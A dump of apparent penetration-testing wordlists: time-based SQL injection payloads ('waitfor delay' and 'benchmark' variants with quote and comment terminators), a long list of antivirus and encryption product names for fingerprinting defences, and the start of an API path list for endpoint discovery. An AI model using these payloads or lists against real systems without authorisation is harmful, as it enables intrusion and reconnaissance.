waitfor delay '0:0:__TIME__' -- 130 | ",NULL) waitfor delay '0:0:__TIME__' /* 131 | ",NULL) waitfor delay '0:0:__TIME__' -- 132 | ),NULL) waitfor delay '0:0:__TIME__' /* 133 | ),NULL) waitfor delay '0:0:__TIME__' -- 134 | '),NULL) waifor delay '0:0:__TIME__' /* 135 | '),NULL) waitfor delay '0:0:__TIME__' -- 136 | "),NULL) waitfor delay '0:0:__TIME__' /* 137 | "),NULL) waitfor delay '0:0:__TIME__' -- 138 | ,NULL,NULL) waitfor delay '0:0:__TIME__' /* 139 | ,NULL,NULL) waitfor delay '0:0:__TIME__' -- 140 | ',NULL,NULL) waitfor delay '0:0:__TIME__' /* 141 | ',NULL,NULL) waitfor delay '0:0:__TIME__' -- 142 | ",NULL,NULL) waitfor delay '0:0:__TIME__' /* 143 | ",NULL,NULL) waitfor delay '0:0:__TIME__' -- 144 | ),NULL,NULL) waitfor delay '0:0:__TIME__' /* 145 | ),NULL,NULL) waitfor delay '0:0:__TIME__' -- 146 | '),NULL,NULL) waitfor delay '0:0:__TIME__' /* 147 | '),NULL,NULL) waitfor delay '0:0:__TIME__' -- 148 | "),NULL,NULL) waitfor delay '0:0:__TIME__' /* 149 | "),NULL,NULL) waitfor delay '0:0:__TIME__' -- 150 | ,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 151 | ,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 152 | ',NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 153 | ',NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 154 | ",NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 155 | ",NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 156 | ),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 157 | ),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 158 | '),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 159 | '),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 160 | "),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 161 | "),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 162 | ,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 163 | ,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 164 | ',NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 165 | ',NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 166 | ",NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 167 | ",NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 168 | ),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 169 | ),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 170 | '),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 171 | '),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 172 | "),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 173 | "),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 174 | ,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 175 | ,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 176 | ',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 177 | ',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 178 | ",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 179 | ",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 180 | ),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 181 | ),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 182 | '),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 183 | '),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 184 | "),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 185 | "),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 186 | ,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 187 | ',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 188 | ',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 189 | ",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 190 | ",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 191 | ),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 192 | ),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 193 | '),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 194 | '),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 195 | "),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 196 | "),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 197 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 198 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 199 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 200 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 201 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 202 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 203 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 204 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 205 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 206 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 207 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 208 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 209 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 210 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 211 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 212 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 213 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 214 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 215 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 216 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 217 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 218 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 219 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /* 220 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' -- 221 | ,(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 222 | ,(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 223 | ,(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 224 | ',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 225 | ',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 226 | ',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 227 | ",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 228 | ",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 229 | ",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 230 | ),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 231 | ),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 232 | ),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 233 | '),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 234 | '),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 235 | '),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 236 | "),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 237 | "),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 238 | "),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))# 239 | and 0=benchmark(3000000,MD5(1)) /* 240 | and 0=benchmark(3000000,MD5(1)) -- 241 | and 0=benchmark(3000000,MD5(1)) # 242 | ' and 0=benchmark(3000000,MD5(1)) /* 243 | ' and 0=benchmark(3000000,MD5(1)) -- 244 | ' and 0=benchmark(3000000,MD5(1)) # 245 | " and 0=benchmark(3000000,MD5(1)) /* 246 | " and 0=benchmark(3000000,MD5(1)) -- 247 | " and 0=benchmark(3000000,MD5(1)) # 248 | ) and 0=benchmark(3000000,MD5(1)) /* 249 | ) and 0=benchmark(3000000,MD5(1)) -- 250 | ) and 0=benchmark(3000000,MD5(1)) # 251 | )) and 0=benchmark(3000000,MD5(1)) /* 252 | )) and 0=benchmark(3000000,MD5(1)) -- 253 | )) and 0=benchmark(3000000,MD5(1)) # 254 | ))) and 0=benchmark(3000000,MD5(1)) /* 255 | ))) and 0=benchmark(3000000,MD5(1)) -- 256 | ))) and 0=benchmark(3000000,MD5(1)) # 257 | )))) and 0=benchmark(3000000,MD5(1)) /* 258 | )))) and 0=benchmark(3000000,MD5(1)) -- 259 | )))) and 0=benchmark(3000000,MD5(1)) # 260 | ') and 0=benchmark(3000000,MD5(1)) /* 261 | ') and 0=benchmark(3000000,MD5(1)) -- 262 | ') and 0=benchmark(3000000,MD5(1)) # 263 | ") and 0=benchmark(3000000,MD5(1)) /* 264 | ") and 0=benchmark(3000000,MD5(1)) -- 265 | ") and 0=benchmark(3000000,MD5(1)) # 266 | ')) and 0=benchmark(3000000,MD5(1)) /* 267 | ')) and 0=benchmark(3000000,MD5(1)) -- 268 | ')) and 0=benchmark(3000000,MD5(1)) # 269 | ")) and 0=benchmark(3000000,MD5(1)) /* 270 | ")) and 0=benchmark(3000000,MD5(1)) -- 271 | ")) and 0=benchmark(3000000,MD5(1)) # 272 | '))) and 0=benchmark(3000000,MD5(1)) /* 273 | '))) and 0=benchmark(3000000,MD5(1)) -- 274 | '))) and 0=benchmark(3000000,MD5(1)) # 275 | "))) and 0=benchmark(3000000,MD5(1)) /* 276 | "))) and 0=benchmark(3000000,MD5(1)) -- 277 | "))) and 0=benchmark(3000000,MD5(1)) # 278 | ')))) and 0=benchmark(3000000,MD5(1)) /* 279 | ')))) and 0=benchmark(3000000,MD5(1)) -- 280 | ')))) and 0=benchmark(3000000,MD5(1)) # 281 | ")))) and 0=benchmark(3000000,MD5(1)) /* 282 | ")))) and 0=benchmark(3000000,MD5(1)) -- 283 | ")))) and 0=benchmark(3000000,MD5(1)) # 284 | -------------------------------------------------------------------------------- /antivirus_names.txt: -------------------------------------------------------------------------------- 1 | 360 Skylar 2 | PC-Clean 3 | Kingsoft Internet Security 4 | Avira AntiVir Windows Workstation 5 | ByteFence Anti-Malware 6 | Keylogger Detector 7 | SafeHouse 8 | Kingsoft Antivirus 9 | G Data Security Client 10 | Total Defense Anti-Virus 11 | VIPRE Antivirus 12 | WISO Internet Security 13 | CHOMAR Antivirus 14 | VIPRE Managed Antivirus 15 | K7VirusSecurity Plus 16 | Max Secure Total Security 17 | Trend Micro Security 18 | Secure IT 19 | HitmanPro 20 | Quick Guard Total Security 21 | Panda Gold Protection 22 | Preventon Antivirus 23 | Auslogics Antivirus 2013 24 | avast! Internet Security 25 | Rising Personal FireWall 26 | Advanced SystemCare 27 | File Encryption eXtra Protection 28 | ESET Cyber Security Pro 29 | COMODO Internet Security Pro 30 | Minusoft Kido 31 | iolo System Shield 32 | F-PROT Antivirus for Windows 33 | IObit Malware Fighter 34 | Kapha Anti-Malware 35 | ESET Mail Security for Microsoft Exchange Server 36 | Cisco Advanced Malware Protection for Endpoints 37 | EMCO Malware Destroyer 38 | NETGATE Spy Emergency 39 | Symantec AntiVirus 40 | Xyvos WhiteList Antivirus 41 | Exterminate It! 42 | Norton AntiVirus 43 | COMODO Internet Security Complete 44 | Trend Micro Titanium 45 | Symantec Endpoint Protection 46 | Webroot SecureAnywhere 47 | F-Secure Internet Security 48 | Microminder Sentinel Antivirus 49 | ProDot Maximum Security 50 | Kaspersky Security Cloud 51 | NCP Secure Entry Client 52 | Panda Dome 53 | PC Tools Internet Security 54 | Microsoft Intune Endpoint Protection 55 | Fusion360 Anti Spyware 56 | AutoKrypt 57 | HEAT Endpoint Management and Security Suite Agent 58 | Symantec Encryption Desktop 59 | ViRobot 60 | Bit9 Agent 61 | VoodooShield 62 | McAfee Security 63 | Digital Patrol 64 | ESET Endpoint Security 65 | McAfee All Access 66 | Trend Micro Titanium Maximum Security 67 | COMODO Internet Security Premium 68 | Net Protector 69 | AntiVirus Thor 70 | Combo Cleaner: Antivirus and System Optimizer 71 | Returnil System Safe 72 | Endurance Antivirus 73 | Bitdefender Windows 8 Security 74 | F-Secure PSB Workstation Security 75 | Symantec Hosted Endpoint Protection 76 | Webroot AntiVirus with AntiSpyware 77 | Windows Device Encryption 78 | TELUS security services 79 | Avira Free Antivirus 80 | TACHYON Endpoint Security 81 | Vivo Segurança Online 82 | Reza AntiVirus 83 | MalwareSecure 84 | PS-PROFILER Trend Micro Maximum Security 85 | PowerBroker Endpoint Protection Platform for Desktops 86 | AVG Internet Security Business Edition 87 | McAfee LiveSafe - Internet Security 88 | Zillya! Antivirus 89 | CrowdStrike Falcon 90 | NETGATE AMITI Antivirus 91 | Microsoft Forefront Endpoint Protection 92 | VeraCrypt 93 | CylancePROTECT 94 | Rapport 95 | CS Anti-Virus 96 | TrustPort Total Protection 97 | F-Secure Anti-Virus 98 | McAfee Small Business - PC Security 99 | McAfee AntiVirus Plus 100 | ClamWin Free Antivirus 101 | Quick Heal AntiVirus 102 | Arcabit Endpoint AntiVirus 103 | Security Manager AV Defender 104 | vCenter Protect Essentials 105 | Trojan Killer 106 | PGP Desktop 107 | Bitdefender Endpoint Security for Mac 108 | G Data AntiVirenKit Client 109 | eScan Corporate for Microsoft SBS Standard 110 | Mac OS X Builtin Firewall 111 | Metascan 112 | Ad-Aware 113 | Norman Antivirus for Mac 114 | McAfee Security-as-a-Service 115 | Carbon Black Defense 116 | XANA Evolution Antivirus 117 | Kaspersky Endpoint Security 118 | Endpoint Security 119 | MacBooster 120 | Zemana Endpoint Security 121 | Flextivity 122 | VirusChaser 123 | Defender Pro 15-in-1 124 | SpyZooka 125 | Trend Micro Titanium Internet Security 126 | McAfee CloudAV 127 | nProtect Anti-Virus/Spyware 128 | GFI Cloud - Antivirus 129 | REVE Antivirus 130 | Roboscan Internet Security Pro 131 | VIRUSfighter 132 | Ad-Aware Total Security 133 | Sophos Endpoint Security and Control 134 | eScan Anti-Virus (AV) Edition for SMB 135 | Roboscan Internet Security Free 136 | LANDesk Endpoint Security 137 | SUPERAntiSpyware 138 | Avast Mac Security 139 | Online Armor 140 | IObit Security 360 141 | F-Secure Computer Protection for Mac 142 | AVG AntiVirus 143 | Carbon Black Response 144 | COMODO Cloud Antivirus 145 | WinMend System Doctor 146 | Double Anti-Spy Professional 147 | UnThreat AntiVirus 148 | Panda Security for Desktops 149 | PC Tools Spyware Doctor with AntiVirus 150 | eEye Digital Security Blink Professional 151 | Avira Server Security 152 | Trend Micro Safe Lock 153 | F-Secure Computer Protection Premium 154 | adaware antivirus pro 155 | Metadefender 156 | ITbrain Anti-Malware 157 | Sophos Home 158 | Avira Antivirus Pro 159 | AVG Internet Security 160 | VipreAV 161 | Avira Premium Security Suite 162 | Avast Business Antivirus 163 | CyberByte Antivirus 164 | Avira Professional Security 165 | Rogers Online Protection Premium 166 | Autorun Eater 167 | PC Cleaner Pro 168 | EG Anti Virus 169 | Dr.Web Light 170 | MSecure DenyWall Total Security 360 171 | Panda Cloud Cleaner 172 | Max Internet Securіty 173 | avast! Endpoint Protection Plus 174 | AhnLab V3 Internet Security 175 | Ferrari Security Scan 176 | Antivirus Zap 177 | Heimdal Thor Agent 178 | Microsoft Forefront Client Security 179 | McAfee Endpoint Encryption 180 | The Shield Deluxe 181 | OSHI Defender 182 | ProDot Antivirus 183 | Sophos Cloud Endpoint 184 | PS-PROFILER Windows Defender 185 | Rising Internet Security 186 | Avira Family Protection Suite 187 | Rogers Online Protection Basic 188 | AVG Business 189 | Avira Internet Security 190 | 360 Total Security 191 | Anvi Smart Defender 192 | Norman Security Suite 193 | Zemana AntiMalware 194 | COMODO Firewall 195 | Panda Cloud Office Protection 196 | Asiainfo OfficeScan Agent 197 | Outpost Security Suite Pro 198 | Arcabit Internet Security 199 | COMODO Disk Encryption 200 | Faronics Anti-Virus Enterprise Workstation 201 | K7 Total Security 202 | COMODO Client - Security 203 | DWS AntiVirus 204 | Bkav Home Plus 205 | BitDefender Antivirus Pro 206 | Komal Antivirus 207 | F-Secure SAFE 208 | Sophos SafeGuard 209 | CMC Antivirus 210 | SWITZ Antivirus 211 | AhnLab V3 Endpoint Security 212 | Morphisec Endpoint Threat Prevention 213 | Managed Antivirus 214 | Avira Internet Security Suite 215 | Malwarebytes Endpoint Agent 216 | VirusKeeper 217 | Crystal Security 218 | TrueCrypt 219 | XoftSpy AntiVirus Pro 220 | G DATA Security Client 221 | Quick Heal Endpoint Security 222 | BullGuard Internet Security 223 | Fix-It Utilities 10 Professional 224 | McAfee Internet Security 225 | Rising AntiVirus 226 | PC Tools AntiVirus Free 227 | Avira Management Console Agent 228 | Panda Antivirus Pro 229 | Sentinel Agent 230 | PS-PROFILER Symantec Endpoint Protection 231 | Virus Chaser 232 | Bitdefender Virus Scanner 233 | Lavasoft Personal Firewall 234 | WinMHR 235 | NANO AntiVirus 236 | idoo AntiSpyware Pro 237 | DiskCryptor 238 | Trend Micro Worry-Free Business Security Agent 239 | Digital Guardian Agent 240 | ePCheal Antivirus 241 | Seqrite Endpoint Security 242 | K7 Ultimate Security 243 | Avira AntiVir Personal - Free Antivirus 244 | G Data AntiVirus 245 | Bitdefender Virus Scanner Plus 246 | Gatekeeper 247 | Kaspersky PURE 248 | Windows Defender 249 | FileVault 250 | Total Defense Internet Security Suite 251 | Avast Business Security 252 | ESET Smart Security 253 | AVG File Server Edition 254 | BitDefender Security for File Servers 255 | eScan Total Security 256 | Immunet 257 | iolo System Mechanic Professional 258 | ESET NOD32 Antivirus 259 | Emsisoft Mamutu 260 | G Data TotalProtection 261 | Panda Free Antivirus 262 | ThreatFire 263 | Faronics Anti-Virus 264 | SecuraShield Total Security Cloud Premium 265 | Norton Security Scan 266 | SPYWAREfighter 267 | Quick Heal Total Security 268 | Sniper Antivirus 269 | NetBarrier 270 | CMC Internet Security 271 | McAfee Total Protection 272 | PC Spyware Protection 273 | Security Shield 274 | F-Secure Client Security Premium 275 | PCKeeper 276 | Bitdefender Endpoint Security 277 | Bitdefender 60-Second Virus Scanner 278 | Norascan 279 | Quick Heal Internet Security 280 | Arovax AntiSpyware 281 | Kaspersky Total Security 282 | Apex One (Mac) Security Agent 283 | eScan Internet Security Suite for Business 284 | Comodo Antivirus for Mac 285 | Cerber AntiVirus 286 | Stronghold AntiMalware 287 | Protegent Antivirus 288 | Preventon Firewall 289 | AVG CloudCare 290 | SparkTrust AntiVirus 291 | FireEye Endpoint Agent 292 | Trend Micro Apex One Security Agent 293 | Clearsight Antivirus 294 | SkyShieldAV 295 | Advanced System Optimizer 296 | F-Secure Anti-Virus for Mac 297 | Jetico Personal Firewall 298 | eGambit Endpoint Security agent 299 | Anti-Malware Pro 300 | Trend Micro Deep Security Agent 301 | Protector Plus 302 | ESET Internet Security 303 | Advanced System Protector 304 | Advanced System Restore 305 | McAfee LiveSafe 306 | Cryptainer LE 307 | Symantec Endpoint Protection Cloud 308 | Gen-X Total Security 309 | AVG AntiVirus Business Edition 310 | VIPRE Business Agent 311 | Outpost Security Suite Free 312 | McAfee Endpoint Protection for Mac 313 | System Center Endpoint Protection 314 | Dr․Web for Mac OS X 315 | Zillya! Internet Security 316 | avast! Premier 317 | McAfee Free Antivirus 318 | Kenoxis Antivirus Pro 319 | Xyvos Antivirus 320 | GridinSoft Anti-Malware 321 | Max Secure AntiVirus 322 | EgoSecure Endpoint Agent 323 | ESET Cyber Security 324 | Kaspersky Security for Virtualization 325 | Chili Antivirus for Mac 326 | TrustPort Internet Security 327 | Seguridad Dispositivo 328 | F-Secure Server Security Premium 329 | VIPRE Business Premium Agent 330 | USB Disk Security 331 | BullGuard Antivirus 332 | VIPRE Internet Security 333 | F-Secure Anti-Virus for Workstations 334 | DefenseWall 335 | ViRobot Internet Security 336 | Advanced Threat Prevention 337 | FreeFixer 338 | ZoneAlarm PRO Firewall 339 | Loaris Trojan Remover 340 | PROSHIELD Antivirus 341 | PC Antivirus Pro 342 | BitSecure Antivirus System 343 | Coranti 344 | WinZip Malware Protector 345 | Telekom Secure Client 346 | Quick Heal AntiVirus Server Edition 347 | Trend Micro Internet Security 348 | SystemSuite 349 | DIY Virus Repair 350 | SpywareBlaster 351 | Malware Eraser 352 | HP Drive Encryption 353 | Trojan Guarder Gold 354 | iDoctor 355 | Zillya! Antivirus for Business 356 | Secure Hunter Anti-Malware Professional 357 | PS-PROFILER McAfee Endpoint Security 358 | Windows Firewall 359 | Sophos Anti-Virus 360 | Dynamikode USB Security Suite 361 | Shield Antivirus 362 | PS-PROFILER Microsoft Security Essentials 363 | LANDesk Antivirus 364 | Arcabit Endpoint Security 365 | ESET Endpoint Encryption 366 | SmadAV 367 | Symantec Endpoint Encryption 368 | DESlock+ 369 | Bitdefender Antivirus Free Edition 370 | Bitdefender Total Security 371 | MaxTotalSecurity 372 | Bkav Pro 373 | AhnLab V3 Lite 374 | F-Secure Client Security 375 | F-Secure Client Security for Mac 376 | AVG Anti-Spyware 377 | Norton 360 378 | Check Point Endpoint Security - Full Disk Encryption 379 | Avira Ultimate Protection Suite 380 | Folder Lock 381 | Avira Antivirus Suite 382 | Suite de Sécurité Orange 383 | G Data TotalCare 384 | Telefonica Vivo Seguranca Online Pacote Internet Fixa 385 | Bitdefender Antivirus Plus 386 | avast! Pro Antivirus 387 | Norton Security Suite 388 | MacKeeper 389 | Reason Core Security 390 | Trend Micro Full Disk Encryption 391 | BestCrypt 392 | Baidu Antivirus 393 | Malwarebytes Anti-Malware 394 | Xvirus Personal Guard 395 | IKARUS anti.virus 396 | VirIT eXplorer PRO 397 | MOVE AV Client 398 | iAntiVirus 399 | PJMagic Total Security 400 | AVG Premium Security 401 | BeeDoctor 402 | VirusBarrier 403 | PS-PROFILER McAfee Total Protection 404 | COMODO Endpoint Security 405 | Traps 406 | PC Tools Spyware Doctor 407 | G Data TotalSecurity 408 | eShield Free Antivirus 409 | Avira Management Console Server 410 | SpyHunter 411 | ALYac Enterprise 412 | McAfee All Access - Internet Security 413 | McAfee VirusScan Enterprise 414 | Netbook Optimizer 415 | HitmanPro.Alert 416 | Bitdefender Business Client 417 | Quick Heal Firewall Pro 418 | K7 Virus Security ZERO 419 | PS-PROFILER Kaspersky Endpoint Security for Windows 420 | K7 Endpoint Security 421 | Tech Guard Internet Security 422 | Trend Micro Titanium Antivirus+ 423 | Trend Micro VirusBuster 424 | MacScan 425 | BullGuard Premium Protection 426 | Kaspersky Small Office Security 427 | Mcafee Multi Access - Internet Security 428 | avast! Endpoint Protection 429 | Quick Heal Internet Security Essentials 430 | CleanMyMac X 431 | McAfee AntiVirus 432 | Vba32 for Windows Vista 433 | EarthLink Protection Control Center 434 | Panda Adaptive Defense 360 435 | TrustPort Antivirus 436 | Antiy Ghostbusters 437 | Max Secure Anti Virus Plus 438 | F-Secure Computer Protection 439 | Carbon Black Defense Sensor 440 | Avira Mac Security 441 | Thirtyseven4 AntiVirus 442 | FortiClient 443 | eScan Internet Security 444 | eScan Internet Security Suite for SMB 445 | McAfee Host Intrusion Prevention 446 | Dr.Web Anti-virus for Windows 447 | UnHackMe 448 | Advance Spyware Remover 449 | CryptArchiver Lite 450 | 360 Internet Security 451 | Dell Data Protection | Encryption 452 | Kaspersky Security for Windows Servers 453 | PS-PROFILER Sophos Home 454 | YAC 455 | FortKnox Personal Firewall 456 | eScan Anti-Virus 457 | ZoneAlarm Free Firewall 458 | Panda Internet Security 459 | PremiumIS Internet Security 460 | VIPRE Business 461 | Zillya Total Security 462 | CA Internet Security Suite 463 | Xvirus Anti-Malware 464 | Kaspersky Internet Security 465 | Emsisoft Internet Security 466 | Trend Micro OfficeScan Client 467 | Emsisoft Anti-Malware 468 | Nynja Clean - Antivirus 469 | enSilo Data Protection Collector 470 | digital-defender Antivirus 471 | AhnLab V3 Net for Windows Server 472 | Lavasoft Privacy Toolbox 473 | NETGATE Internet Security 474 | Webroot SecureAnywhere Complete 475 | McAfee Endpoint Security for Mac 476 | Panda Global Protection 477 | Panda Antivirus 478 | PS-PROFILER Sophos Endpoint Protection 479 | RemoveIT Pro Enterprise 480 | avast! Endpoint Protection Suite 481 | BitLocker Drive Encryption 482 | Kaspersky Anti-Virus 483 | VIPRE Business for Mac Agent 484 | Defender Pro 485 | Malwarebytes Anti-Malware for Business 486 | System Center Endpoint Protection for Mac 487 | G Data NotebookSecurity 488 | CYSEC AV 489 | K7 AntiVirus Premium 490 | Sophos Endpoint 491 | ShareCrypt 492 | AVANSI Antivirus 493 | Panda Cloud Antivirus 494 | adaware antivirus free 495 | BestCrypt Volume Encryption 496 | avast! Free Antivirus 497 | Lavasoft Digital Lock 498 | Twister Antivirus 499 | Tencent PC Manager 500 | Malwarebytes Anti-Malware Premium 501 | Malware Hunter 502 | GFI Cloud Agent 503 | SafeGuard PrivateDisk 504 | C-Guard Antivirus 505 | Panda Internet Security for Netbooks 506 | Tech Tune-Up Security 507 | Privatefirewall 508 | DoorStop X 509 | STOPzilla AntiVirus 510 | ZoneAlarm PRO Antivirus + Firewall 511 | ZoneAlarm Internet Security Suite 512 | Shadow Defender 513 | Outpost Firewall Pro 514 | Avira Antivirus Premium 515 | Adware Remover 516 | G Data InternetSecurity 517 | PremiumAV Antivirus 518 | avast! File Server Security 519 | Malwarebytes 520 | WardWiz 521 | Bazooka Scanner 522 | Bitdefender Endpoint Security Tools 523 | Check Point Endpoint Security 524 | ESET Endpoint Antivirus 525 | PCKeeper Antivirus 526 | ClamXav 527 | Kaspersky Free 528 | CryptoExpert 529 | SecureAPlus 530 | eScan Corporate Edition 531 | COMODO Antivirus 532 | Pika Purger 533 | ZoneAlarm Security Suite 534 | VIPRE Endpoint Security Agent 535 | Norton Security 536 | Spyware Terminator 537 | Dr.Web Security Space 538 | ProtectMac AntiVirus 539 | Bitdefender Internet Security 540 | Outpost Antivirus Pro 541 | Avetix 542 | PC Tools Firewall Plus 543 | Max Spyware Detector 544 | McAfee Endpoint Security 545 | Smart Heal Total Security 546 | Microsoft Security Essentials 547 | COMODO Internet Security Plus 548 | Panda Endpoint Protection 549 | Max Secure Anti Virus 550 | Norton Security with Backup 551 | ZoneAlarm Free Antivirus + Firewall 552 | RRAV AntiVirus Plus 553 | Ad-Aware 2008 554 | Norton Internet Security 555 | SecureDoc 556 | ZoneAlarm Extreme Security 557 | Cybereason ActiveProbe 558 | VIPRE Advanced Security 559 | Max Secure Anti Virus Enterprise Edition 560 | Avira Endpoint Security 561 | Bitdefender Antivirus for Mac 562 | K7 Anti-Virus Plus 563 | Norman EndPoint Protection 564 | PowerBroker Endpoint Protection Platform for Servers 565 | avast! Endpoint Protection Suite Plus 566 | Kaspersky Security Scan 567 | Dr.Web KATANA 568 | eEye Digital Security Blink Personal 569 | Arcabit AntiVirus 570 | AVG AntiVirus Free 571 | -------------------------------------------------------------------------------- /api.txt: -------------------------------------------------------------------------------- 1 | /api-docs/v1/openapi.json 2 | /api/ 3 | /api/admin 4 | /api/admin/auth 5 | /api/admin/menu 6 | /api/admin/menu/tree 7 | /api/admin/properties 8 | /api/admin/role 9 | /api/admin/role/id/ 10 | /api/admin/role/perm 11 | /api/admin/role/status 12 | /api/admin/user 13 | /api/admin/user/id/ 14 | /api/admin/user/password 15 | /api/admin/user/status 16 | /api/auth 17 | /api/auth/v1/pin/verify 18 | /api/authentication 19 | /api/axerve 20 | /api/BasmaPlusGlobal 21 | /api/cch/v1/anamnesis 22 | 